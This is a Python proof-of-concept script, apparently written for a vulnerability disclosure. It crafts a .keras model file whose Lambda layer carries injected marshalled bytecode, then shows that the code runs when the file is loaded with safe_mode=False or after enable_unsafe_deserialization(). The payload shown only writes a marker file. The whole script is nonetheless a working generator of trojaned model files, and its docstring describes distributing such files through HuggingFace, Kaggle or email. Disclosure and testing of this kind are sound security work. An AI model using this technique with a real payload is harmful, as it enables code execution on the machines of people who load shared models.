| | |
| | """ |
| | Keras .keras Lambda Layer - Arbitrary Code Execution PoC |
| | |
| | VULNERABILITY: |
| | .keras model files are ZIP archives containing config.json. Lambda layers |
| | store base64-encoded marshal'd Python bytecode in config.json under the |
| | "function" -> "config" -> "code" key. When a model is loaded with |
| | safe_mode=False (or after calling tf.keras.config.enable_unsafe_deserialization()), |
| | this bytecode is unmarshalled and executed - enabling arbitrary code execution |
| | from a crafted model file. |
| | |
| | IMPACT: |
| | Any user who loads an untrusted .keras file with safe_mode=False gets arbitrary |
| | code execution. Many official tutorials and StackOverflow answers recommend |
| | safe_mode=False to load models with custom layers. HuggingFace hosts thousands |
| | of .keras files that could be replaced with malicious versions. |
| | |
| | ATTACK VECTOR: |
| | 1. Attacker creates a legitimate-looking .keras model |
| | 2. Attacker replaces Lambda layer bytecode with malicious payload |
| | 3. Victim downloads model from HuggingFace, Kaggle, or email |
| | 4. Victim loads with safe_mode=False -> code executes silently |
| | |
| | AFFECTED: |
| | - keras >= 3.0 (all versions using .keras format) |
| | - tensorflow >= 2.16 (ships keras 3.x) |
| | |
| | TESTED: TensorFlow 2.20.0, Keras 3.13.2, Python 3.12 |
| | |
| | Usage: |
| | python3 poc_keras_lambda_ace.py |
| | """ |
| |
|
| | import os |
| | import sys |
| | import json |
| | import zipfile |
| | import marshal |
| | import base64 |
| | import types |
| | import tempfile |
| | import shutil |
| |
|
| | os.environ["TF_CPP_MIN_LOG_LEVEL"] = "3" |
| |
|
| | MARKER_FILE = "/tmp/keras_ace_marker.txt" |
| | PAYLOAD_MSG = "KERAS_LAMBDA_ACE_CONFIRMED" |
| |
|
| |
|
| | def create_malicious_keras_model(output_path): |
| | import tensorflow as tf |
| | import numpy as np |
| |
|
| | print("[*] Step 1: Building legitimate model with Lambda layer...") |
| | model = tf.keras.Sequential([ |
| | tf.keras.layers.Input(shape=(5,)), |
| | tf.keras.layers.Dense(10, name="dense_1"), |
| | tf.keras.layers.Lambda(lambda x: x * 2, name="lambda_layer"), |
| | tf.keras.layers.Dense(1, name="output"), |
| | ]) |
| | model.compile(optimizer="adam", loss="mse") |
| |
|
| | tmp_dir = tempfile.mkdtemp(prefix="keras_poc_") |
| | legit_path = os.path.join(tmp_dir, "legit.keras") |
| | model.save(legit_path) |
| | print(" Saved legitimate model: {} ({} bytes)".format(legit_path, os.path.getsize(legit_path))) |
| |
|
| | print("[*] Step 2: Extracting .keras ZIP and injecting malicious bytecode...") |
| | with zipfile.ZipFile(legit_path, "r") as zf: |
| | archive_files = {name: zf.read(name) for name in zf.namelist()} |
| |
|
| | config = json.loads(archive_files["config.json"]) |
| |
|
| | evil_source = "lambda x: (__import__('builtins').open('{}', 'w').write('{}\\n'), x)[-1]".format( |
| | MARKER_FILE, PAYLOAD_MSG |
| | ) |
| | print(" Payload: write '{}' to {}".format(PAYLOAD_MSG, MARKER_FILE)) |
| |
|
| | evil_expr = compile(evil_source, "<payload>", "eval") |
| | lambda_code = [c for c in evil_expr.co_consts if isinstance(c, types.CodeType)][0] |
| |
|
| | evil_b64 = base64.b64encode(marshal.dumps(lambda_code)).decode() + "\n" |
| | print(" Encoded bytecode: {} chars".format(len(evil_b64))) |
| |
|
| | def inject_into_lambda(obj): |
| | if isinstance(obj, dict): |
| | if obj.get("class_name") == "Lambda" and "config" in obj: |
| | func = obj["config"].get("function", {}) |
| | if isinstance(func, dict) and "config" in func: |
| | func["config"]["code"] = evil_b64 |
| | print(" Injected payload into Lambda layer config") |
| | return True |
| | for v in obj.values(): |
| | if isinstance(v, (dict, list)) and inject_into_lambda(v): |
| | return True |
| | elif isinstance(obj, list): |
| | for v in obj: |
| | if inject_into_lambda(v): |
| | return True |
| | return False |
| |
|
| | if not inject_into_lambda(config): |
| | print(" ERROR: Could not find Lambda layer in config.json") |
| | sys.exit(1) |
| |
|
| | print("[*] Step 3: Repacking .keras file with malicious config...") |
| | archive_files["config.json"] = json.dumps(config).encode() |
| | with zipfile.ZipFile(output_path, "w", zipfile.ZIP_DEFLATED) as zf: |
| | for name, data in archive_files.items(): |
| | zf.writestr(name, data) |
| |
|
| | print(" Malicious model: {} ({} bytes)".format(output_path, os.path.getsize(output_path))) |
| | shutil.rmtree(tmp_dir) |
| |
|
| |
|
| | def test_safe_mode_true(model_path): |
| | import tensorflow as tf |
| | print("\n[*] Test A: Loading with safe_mode=True (default)...") |
| | if os.path.exists(MARKER_FILE): |
| | os.remove(MARKER_FILE) |
| | try: |
| | tf.keras.models.load_model(model_path) |
| | print(" Model loaded (unexpected)") |
| | return os.path.exists(MARKER_FILE) |
| | except Exception as e: |
| | print(" Blocked as expected: {}".format(str(e)[:150])) |
| | return False |
| |
|
| |
|
| | def test_safe_mode_false(model_path): |
| | import tensorflow as tf |
| | import numpy as np |
| | print("\n[*] Test B: Loading with safe_mode=False...") |
| | if os.path.exists(MARKER_FILE): |
| | os.remove(MARKER_FILE) |
| | try: |
| | loaded = tf.keras.models.load_model(model_path, safe_mode=False) |
| | print(" Model loaded with safe_mode=False") |
| |
|
| | if os.path.exists(MARKER_FILE): |
| | with open(MARKER_FILE) as f: |
| | content = f.read().strip() |
| | print(" >>> ACE CONFIRMED ON LOAD: marker = '{}'".format(content)) |
| | return True |
| |
|
| | print(" No execution on load. Running inference...") |
| | result = loaded.predict(np.random.randn(1, 5), verbose=0) |
| | print(" Inference result: {}".format(result)) |
| |
|
| | if os.path.exists(MARKER_FILE): |
| | with open(MARKER_FILE) as f: |
| | content = f.read().strip() |
| | print(" >>> ACE CONFIRMED ON INFERENCE: marker = '{}'".format(content)) |
| | return True |
| |
|
| | print(" No ACE triggered") |
| | return False |
| | except Exception as e: |
| | print(" Error: {}".format(str(e)[:300])) |
| | return False |
| |
|
| |
|
| | def test_enable_unsafe_deserialization(model_path): |
| | import tensorflow as tf |
| | import numpy as np |
| | print("\n[*] Test C: Loading with enable_unsafe_deserialization()...") |
| | if os.path.exists(MARKER_FILE): |
| | os.remove(MARKER_FILE) |
| | try: |
| | tf.keras.config.enable_unsafe_deserialization() |
| | loaded = tf.keras.models.load_model(model_path) |
| | print(" Model loaded with enable_unsafe_deserialization") |
| |
|
| | if os.path.exists(MARKER_FILE): |
| | with open(MARKER_FILE) as f: |
| | content = f.read().strip() |
| | print(" >>> ACE CONFIRMED ON LOAD: marker = '{}'".format(content)) |
| | return True |
| |
|
| | print(" No execution on load. Running inference...") |
| | result = loaded.predict(np.random.randn(1, 5), verbose=0) |
| |
|
| | if os.path.exists(MARKER_FILE): |
| | with open(MARKER_FILE) as f: |
| | content = f.read().strip() |
| | print(" >>> ACE CONFIRMED ON INFERENCE: marker = '{}'".format(content)) |
| | return True |
| |
|
| | print(" No ACE triggered") |
| | return False |
| | except Exception as e: |
| | print(" Error: {}".format(str(e)[:300])) |
| | return False |
| |
|
| |
|
| | def main(): |
| | print("=" * 70) |
| | print("Keras .keras Lambda Layer - Arbitrary Code Execution PoC") |
| | print("=" * 70) |
| |
|
| | script_dir = os.path.dirname(os.path.abspath(__file__)) |
| | malicious_model = os.path.join(script_dir, "malicious_lambda.keras") |
| |
|
| | if os.path.exists(MARKER_FILE): |
| | os.remove(MARKER_FILE) |
| |
|
| | create_malicious_keras_model(malicious_model) |
| |
|
| | ace_safe = test_safe_mode_true(malicious_model) |
| | ace_unsafe = test_safe_mode_false(malicious_model) |
| | ace_global = test_enable_unsafe_deserialization(malicious_model) |
| |
|
| | print("\n" + "=" * 70) |
| | print("RESULTS:") |
| | print(" safe_mode=True (default): {}".format("ACE!" if ace_safe else "Blocked (correct)")) |
| | print(" safe_mode=False: {}".format("ACE!" if ace_unsafe else "No ACE")) |
| | print(" enable_unsafe_deserialization(): {}".format("ACE!" if ace_global else "No ACE")) |
| | print() |
| |
|
| | if ace_unsafe or ace_global: |
| | print("VULNERABILITY CONFIRMED: .keras Lambda bytecode enables arbitrary") |
| | print("code execution when loaded with safe_mode=False or after calling") |
| | print("enable_unsafe_deserialization().") |
| | print() |
| | print("Marker file: {}".format(MARKER_FILE)) |
| | if os.path.exists(MARKER_FILE): |
| | with open(MARKER_FILE) as f: |
| | print("Contents: {}".format(f.read().strip())) |
| | print("\nMalicious model saved to: {}".format(malicious_model)) |
| | else: |
| | print("No ACE triggered. Check TensorFlow/Keras version.") |
| |
|
| | print("=" * 70) |
| |
|
| |
|
| | if __name__ == "__main__": |
| | main() |
| |
|